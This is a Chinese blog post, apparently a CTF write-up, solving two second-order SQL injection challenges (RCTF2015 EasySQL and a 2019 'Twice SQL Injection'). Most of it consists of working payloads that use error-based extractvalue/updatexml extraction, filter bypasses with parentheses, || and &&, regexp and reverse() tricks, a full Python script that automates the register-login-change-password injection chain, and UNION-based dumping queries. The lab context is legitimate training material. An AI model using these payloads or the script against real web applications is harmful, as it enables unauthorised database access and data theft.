持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第23天,点击查看活动详情
[RCTF2015]EasySQL
两个界面,注册和登录,猜测可能存在二次注入
测试发现,注册一个admin"用户并且在修改页面进行操作时会错报
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" and pwd='202cb962ac59075b964b07152d234b70'' at line 1
注入点就在这里
猜测SQL语句为
update 表 set password='xxx' where username='xx' and pwd='xx'
接下来就是错报注入,经过测试发现注册的username过滤了空格和and、or、/ *
用()
来绕过空格
and、or可以用||和 &&
绕过
测试语句:
admin"||extractvalue(1,concat(0x7e,user(),0x7e))#
进行了数据的返回,说明可行
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e))#
name,pwd,email,real_flag_1s_her
一系列发现flag在user表里
用mid、substr、left、right尝试截取后面未显示出来的字符不行,被过滤了
这里考到了利用正则来截取字符
select * from test where name regexp '^r'
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)=('users')%26%26(column_name)regexp('^r')),0x7e))#
real_flag_1s_here
admin"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e))#
reserve()函数将字符串反转
admin"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e))#
题目到这就结束了,网上查看时发现有大佬写了脚本,这里贴一下以后可能会用到
import requests
session = requests.session()
url = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/register.php'
#爆库
#name = 'test"||(updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1))#'
#爆表
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#'
#爆列名(第一次获得的flag列名并不是完整的列名)
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))),1)#'
#regexp正则爆完整列名
#name = 'test"^updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")&&(column_name)regexp("^r"))),1)#'
#爆数据(因为updatexml报错只能显示20个字符,所以还要把另一半显示出来)
#name = 'username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))),1))#'
#逆序在输出一遍
name = 'test"^updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))),1)#'
#}4af6e7d54142 -ed3a-0784-720f-a7
#flag{eb26f47a-f027-4870-a3de-24145d7e6fa4}
data1 = {
'username': name,
'password': '123',
'email': '123'
}
req1 = session.post(url,data=data1)
url2 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/login.php'
data2 = {
'username': name,
'password': '123'
}
req2 = session.post(url2,data2)
url3 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/changepwd.php'
data = {
'newpass': '1234',
'oldpass': '123'
}
req3 = session.post(url3,data)
print(req3.text)
flag{c3b0de7a-8919-49ec-9311-ffe8462851fc}
拼接一下就是flag
October 2019 Twice SQL Injection
也是二次注入,也是很简单的页面,比上一个简单一些
XINO' union select database() #
注册点存在注入
XINO' union select database() #
XINO' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
XINO' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
XINO' union select flag from flag #
直接走就可以